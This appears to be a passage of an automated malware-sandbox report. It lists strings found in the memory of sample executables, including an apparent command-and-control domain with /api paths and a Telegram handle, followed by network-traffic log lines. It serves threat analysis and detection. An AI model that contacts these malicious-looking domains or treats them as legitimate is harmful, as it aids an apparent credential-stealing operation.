Source: random.exe, 00000000.00000003.1729707833.0000000005571000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2423611667.0000000005425000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2527180753.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2741625350.0000000005695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: 0436fcd702.exe, 00000010.00000003.2562250562.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0436fcd702.exe, 00000010.00000003.2562250562.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000003.2138037095.000000000BF49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: random.exe, 00000000.00000003.1741638925.0000000005568000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1740975150.0000000005568000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1729707833.000000000556F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1729774065.0000000005568000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000003.2052006188.0000000005BCE000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2423611667.0000000005423000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2436731187.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2424208458.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2436063009.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2527180753.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2527352583.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2540466182.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2761566439.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2741625350.0000000005693000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2742691910.0000000005647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: random.exe, 00000000.00000003.1729774065.0000000005543000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2424208458.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2527352583.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2742691910.0000000005622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: random.exe, 00000000.00000003.1741638925.0000000005568000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1740975150.0000000005568000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1729707833.000000000556F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1729774065.0000000005568000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000003.2052006188.0000000005BCE000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2423611667.0000000005423000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2436731187.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2424208458.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2436063009.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2527180753.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2527352583.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2540466182.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2761566439.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2741625350.0000000005693000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2742691910.0000000005647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: random.exe, 00000000.00000003.1729774065.0000000005543000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2424208458.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2527352583.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2742691910.0000000005622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: 071b4af2c1.exe, 0000002C.00000003.2755830883.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2756314289.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2755830883.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2780767722.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m08mbk
Source: 071b4af2c1.exe, 0000002C.00000003.2755830883.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m08mbk6
Source: 071b4af2c1.exe, 0000002C.00000003.2719984799.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/m08mbkhac22tlMozilla/5.0
Source: random.exe, 00000000.00000003.1781688270.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1768481276.000000000551E000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1785293884.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1781620605.0000000005521000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1872072345.0000000005521000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1781759717.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1768693050.0000000005521000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1790618883.0000000005516000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1784778909.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2556594041.0000000005A84000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2610813505.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711860682.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/
Source: random.exe, 00000000.00000003.1716595441.0000000000E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/1
Source: 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711672150.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/9
Source: 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711672150.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/A
Source: 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/Y
Source: 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/a
Source: 0436fcd702.exe, 00000010.00000003.2811275260.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2576643478.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2556448724.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2615752658.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2641552377.0000000005AA5000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2576937341.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2561946540.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2641552377.0000000005A8E000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2542873548.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2542049848.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2641867461.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2610813505.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2592171995.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711672150.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2782262885.0000000005610000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711860682.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/api
Source: 0436fcd702.exe, 00000010.00000003.2825195677.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2623332550.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2811275260.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2641867461.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiL
Source: 0436fcd702.exe, 00000010.00000003.2611282578.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2825195677.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2623332550.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2811275260.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2616347054.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2641867461.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiR
Source: 0436fcd702.exe, 00000010.00000003.2611282578.00000000014C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiY
Source: random.exe, 00000000.00000003.1791000051.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apie
Source: random.exe, 00000000.00000003.1781688270.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apil
Source: random.exe, 00000000.00000003.1791000051.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apis
Source: 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apix
Source: random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apiz
Source: random.exe, 00000000.00000003.1768693050.000000000552B000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1768481276.000000000552B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/apizdf_
Source: 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711672150.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/i
Source: random.exe, 00000000.00000003.1791000051.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/ndows
Source: random.exe, 00000000.00000003.1791000051.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1871942861.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/o
Source: 0436fcd702.exe, 00000010.00000003.2576643478.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2597636792.0000000005A86000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2610999877.0000000005A85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org/w%
Source: random.exe, 00000000.00000003.1716595441.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711860682.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/api
Source: 0436fcd702.exe, 00000017.00000003.2711860682.0000000000B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://warlikedbeliev.org:443/api8k
Source: 071b4af2c1.exe, 0000002C.00000003.2755830883.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2755830883.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, 071b4af2c1.exe, 0000002C.00000003.2782068015.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2182955957.000000000BD03000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2642218318.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2616608069.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2611477709.0000000005A82000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2577162040.0000000005A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000029.00000003.2711208308.00000245A5D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710879614.00000245A5D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2711555016.00000245A5D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710532724.00000245A5B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: random.exe, 00000000.00000003.1716259373.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1716595441.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1716595441.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2711860682.0000000000B74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: random.exe, 00000000.00000003.1716259373.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1716595441.0000000000E44000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2700281129.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: freebl3.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2182955957.000000000BD03000.00000004.00000020.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2642218318.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2616608069.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2611477709.0000000005A82000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2577162040.0000000005A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000029.00000003.2711208308.00000245A5D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710879614.00000245A5D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2711555016.00000245A5D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710532724.00000245A5B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: random.exe, 00000000.00000003.1728515741.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728708622.000000000555A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1728374400.000000000555C000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421722559.00000000053CB000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2421961748.00000000053C9000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525177048.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2524920657.0000000005ACF000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2525558121.0000000005ACC000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2727854894.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000017.00000003.2725441759.000000000563B000.00000004.00000800.00020000.00000000.sdmp, tmpB7AB.tmp.14.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000029.00000003.2711208308.00000245A5D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710879614.00000245A5D20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2711555016.00000245A5D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2710532724.00000245A5B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000029.00000003.2712228102.00000245A5D7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/----HCAEBFBKKJDHIDHIDBAEst.exe
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/HDHDGDGCFBKJ
Source: 0436fcd702.exe, 00000010.00000003.2562250562.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lXy50eHQ=host.exe
Source: 0436fcd702.exe, 00000010.00000003.2562250562.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: random.exe, 00000000.00000003.1756845181.000000000563D000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000003.2138037095.000000000BF49000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2459114922.00000000054A2000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2562250562.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0436fcd702.exe, 00000010.00000003.2562250562.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/Hz
Source: random.exe, 00000000.00000003.1756845181.000000000563D000.00000004.00000800.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000003.2138037095.000000000BF49000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2459114922.00000000054A2000.00000004.00000800.00020000.00000000.sdmp, 0436fcd702.exe, 00000010.00000003.2562250562.0000000005BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178019911.00000000010B7000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: firefox.exe, 00000028.00000002.2695376270.000002184F570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000027.00000002.2681910862.00000207FF61F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2695376270.000002184F57F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser

Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
